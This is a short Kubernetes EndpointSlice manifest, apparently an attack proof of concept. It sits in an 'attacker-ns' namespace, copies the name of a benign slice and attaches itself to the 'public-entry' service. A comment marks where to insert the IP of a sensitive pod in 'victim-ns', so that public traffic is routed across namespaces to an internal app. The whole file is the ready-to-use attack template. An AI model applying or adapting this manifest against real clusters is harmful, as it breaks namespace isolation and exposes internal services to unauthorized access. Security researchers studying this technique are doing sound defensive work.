apiVersion: discovery.k8s.io/v1
kind: EndpointSlice
metadata:
  name: public-entry-initial   # same name as the benign slice
  namespace: attacker-ns
  labels:
    kubernetes.io/service-name: public-entry
addressType: IPv4
ports:
  - name: http
    protocol: TCP
    port: 80
endpoints:
  - addresses:
      - "10.244.0.8"   # <-- REPLACE with sensitive-app pod IP in victim-ns
    conditions:
      ready: true
